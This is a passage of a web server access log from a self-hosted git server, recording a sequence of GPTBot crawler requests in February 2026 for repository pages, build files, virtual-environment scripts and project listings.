+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:16:50:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1?display=rendered" [Client 74.7.227.38] [Length 11010] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/Activate.ps1" -[17/Feb/2026:16:50:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:16:50:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js?display=source" [Client 74.7.227.38] [Length 22050] [Gzip 6.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:16:50:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:16:50:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:16:50:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static/js/app.js" -[17/Feb/2026:16:50:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/organizations?q=&sort=newest" [Client 74.7.227.38] [Length 5075] [Gzip 2.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/organizations" -[17/Feb/2026:16:50:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/users?q=&sort=alphabetically" [Client 74.7.227.38] [Length 5470] [Gzip 2.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/users" -[17/Feb/2026:16:50:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/organizations?q=&sort=oldest" [Client 74.7.227.38] [Length 5084] [Gzip 2.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/organizations" -[17/Feb/2026:16:50:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?q=&sort=name&state=open" [Client 74.7.227.38] [Length 8485] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones" -[17/Feb/2026:16:50:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2fglobal.json" [Client 74.7.227.38] [Length 21300] [Gzip 3.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcConnectionTest/global.json" -[17/Feb/2026:16:50:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 12204] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/vite.config.ts" -[17/Feb/2026:16:50:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:16:50:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:16:50:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:16:50:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:16:50:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:16:50:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:16:50:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11105] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/progress.marks" -[17/Feb/2026:16:50:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11060] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" -[17/Feb/2026:16:50:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=name&state=closed" [Client 74.7.227.38] [Length 8498] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?q=&sort=name&state=open" -[17/Feb/2026:16:50:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11097] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" -[17/Feb/2026:16:50:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10919] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/main.py" -[17/Feb/2026:16:50:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/main.py?display=rendered" [Client 74.7.227.38] [Length 10920] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/main.py" -[17/Feb/2026:16:50:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10859] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" -[17/Feb/2026:16:50:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11191] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:50:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13304] [Gzip 4.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir" -[17/Feb/2026:16:50:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs?display=source" [Client 74.7.227.38] [Length 12201] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Worker.cs" -[17/Feb/2026:16:50:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs?display=source" [Client 74.7.227.38] [Length 11587] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/Program.cs" -[17/Feb/2026:16:50:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv?display=source" [Client 74.7.227.38] [Length 11552] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/dotenv" -[17/Feb/2026:16:50:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn?display=source" [Client 74.7.227.38] [Length 11544] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/uvicorn" -[17/Feb/2026:16:50:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/milestones?sort=name&state=open" [Client 74.7.227.38] [Length 8481] [Gzip 2.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/milestones?sort=name&state=closed" -[17/Feb/2026:16:50:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3?display=source" [Client 74.7.227.38] [Length 11092] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python3" -[17/Feb/2026:16:50:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python?display=source" [Client 74.7.227.38] [Length 11080] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/python" -[17/Feb/2026:16:50:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/keys.json?display=rendered" [Client 74.7.227.38] [Length 11180] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/keys.json" -[17/Feb/2026:16:50:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11898] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:50:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" -[17/Feb/2026:16:50:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 2951] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:50:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 14033] [Gzip 9.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" -[17/Feb/2026:16:50:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11897] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:50:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:50:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=rendered" [Client 74.7.227.38] [Length 11110] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:50:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake?display=source" [Client 74.7.227.38] [Length 11848] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" -[17/Feb/2026:16:50:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 9960] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=all&type=all" -[17/Feb/2026:16:50:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/App.tsx" -[17/Feb/2026:16:50:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/.gitignore?display=source" [Client 74.7.227.38] [Length 11516] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/.gitignore" -[17/Feb/2026:16:50:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/vite.config.ts?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/vite.config.ts" -[17/Feb/2026:16:50:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 10910] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/.gitignore" -[17/Feb/2026:16:50:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/types.ts?display=source" [Client 74.7.227.38] [Length 11541] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/types.ts" -[17/Feb/2026:16:50:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11980] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/vite.config.ts" -[17/Feb/2026:16:50:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/App.tsx?display=source" [Client 74.7.227.38] [Length 12803] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 